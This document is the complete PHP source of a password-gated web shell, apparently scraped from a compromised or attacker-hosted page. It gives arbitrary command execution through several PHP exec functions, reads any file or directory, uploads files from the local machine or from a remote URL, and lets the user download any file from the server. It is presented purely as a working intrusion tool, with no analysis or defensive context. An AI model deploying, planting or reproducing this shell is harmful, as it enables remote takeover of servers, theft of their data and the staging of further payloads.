Your IP : 216.73.217.142
<?php
error_reporting(0);
session_start();
$scriptName = basename(__FILE__);
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
$expectedPassword = 'null';
if ($_POST['password'] === $expectedPassword) {
$_SESSION['authenticated'] = true;
} else {
echo '<div style="color:red;">Invalid password. Access denied.</div>';
}
}
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
?>
<h2>Access Requested?</h2>
<form method="POST" action="">
<label for="password">Password:</label>
<input type="password" name="password" id="password" required>
<button type="submit">Submit</button>
</form>
<?php
exit();
}
if (isset($_POST['logout']) && $_POST['logout'] === 'true') {
session_destroy();
header("Location: $scriptName");
exit();
}
?>
<!DOCTYPE html>
<html>
<head><title>Web Shell</title></head>
<body>
<b>Remote Code Execution</b><br />
<form method="GET" action="">
Command: <input type="text" name="command" size="50" value="<?php echo isset($_GET['command']) ? htmlspecialchars($_GET['command']) : ''; ?>" />
<button type="submit">Go</button>
</form>
<?php
if (isset($_GET['command'])) {
$cmd = $_GET['command'];
echo "<pre>Command: " . htmlspecialchars($cmd) . "\nOutput:\n";
$output = '';
if (function_exists('shell_exec')) {
$output = shell_exec($cmd);
} elseif (function_exists('exec')) {
exec($cmd, $out);
$output = implode("\n", $out);
} elseif (function_exists('system')) {
ob_start();
system($cmd);
$output = ob_get_clean();
} elseif (function_exists('passthru')) {
ob_start();
passthru($cmd);
$output = ob_get_clean();
} else {
$output = 'No command execution function available.';
}
echo htmlspecialchars($output === null ? '(no output)' : $output) . "</pre>";
}
?>
<hr />
<b>Retrieve File / Scan Directory</b><br />
Current file path: <?php echo __FILE__; ?><br />
<form method="GET" action="">
Path: <input type="text" name="path" size="50" value="<?php echo isset($_GET['path']) ? htmlspecialchars($_GET['path']) : ''; ?>" />
<button type="submit">Go</button>
</form>
<pre>
<?php
if (isset($_GET['path'])) {
$rawPath = $_GET['path'];
$path = ($rawPath === '') ? './' : $rawPath;
$real = realpath($path);
echo '<b>Realpath:</b> ' . ($real ? htmlspecialchars($real) : 'Failed to resolve') . '<br />';
echo '<b>Type:</b> ';
if (is_dir($path)) {
echo "Directory<br />";
$items = @scandir($path);
if ($items) {
foreach ($items as $item) {
echo htmlspecialchars($item) . "<br />";
}
} else {
echo "Unable to read directory.";
}
} elseif (is_file($path)) {
echo "File<br />";
$content = @file_get_contents($path);
echo $content !== false ? htmlspecialchars($content) : "Failed to read file.";
} else {
echo "Not a valid file or directory.";
}
}
?>
</pre>
<hr />
<b>Upload File From Your Local Machine</b><br />
<form method="POST" action="" enctype="multipart/form-data">
File(s): <input type="file" name="uploads[]" multiple required />
<button type="submit">Upload</button>
</form>
<?php
if (isset($_FILES['uploads'])) {
foreach ($_FILES['uploads']['name'] as $i => $name) {
if ($_FILES['uploads']['error'][$i] === UPLOAD_ERR_OK) {
$tmp = $_FILES['uploads']['tmp_name'][$i];
$dest = './' . basename($name);
if (move_uploaded_file($tmp, $dest)) {
echo "Successfully uploaded " . htmlspecialchars($name) . "<br />";
} else {
echo "Unable to upload " . htmlspecialchars($name) . "<br />";
}
}
}
}
?>
<hr />
<b>Upload File From URL</b><br />
<form method="POST" action="">
Filename to save: <input type="text" name="save_name" size="30" required /><br />
URL: <input type="text" name="url" size="50" required />
<button type="submit">Upload</button>
</form>
<pre>
<?php
if (isset($_POST['save_name']) && isset($_POST['url'])) {
$saveAs = $_POST['save_name'];
$url = $_POST['url'];
$data = false;
if (ini_get('allow_url_fopen')) {
$data = @file_get_contents($url);
}
if ($data === false && function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
curl_close($ch);
}
if ($data !== false && file_put_contents($saveAs, $data)) {
echo "Successfully uploaded " . htmlspecialchars($saveAs);
} else {
echo "Unable to upload " . htmlspecialchars($saveAs) . " (check URL or PHP configuration)";
}
}
?>
</pre>
<hr />
<b>Download File From Web Server</b><br />
<form method="GET" action="">
Filename to download: <input type="text" name="download" size="100" required />
<button type="submit">Download</button>
</form>
<?php
if (isset($_GET['download'])) {
$file = $_GET['download'];
if (file_exists($file) && is_file($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
header('Cache-Control: must-revalidate');
header('Pragma: public');
ob_clean();
flush();
readfile($file);
exit;
} else {
echo "File does not exist or is not a regular file.";
}
}
?>
<hr />
<b>Logout</b><br />
<form method="POST" action="">
<input type="hidden" name="logout" value="true" />
<button type="submit">Logout</button>
</form>
</body>
</html>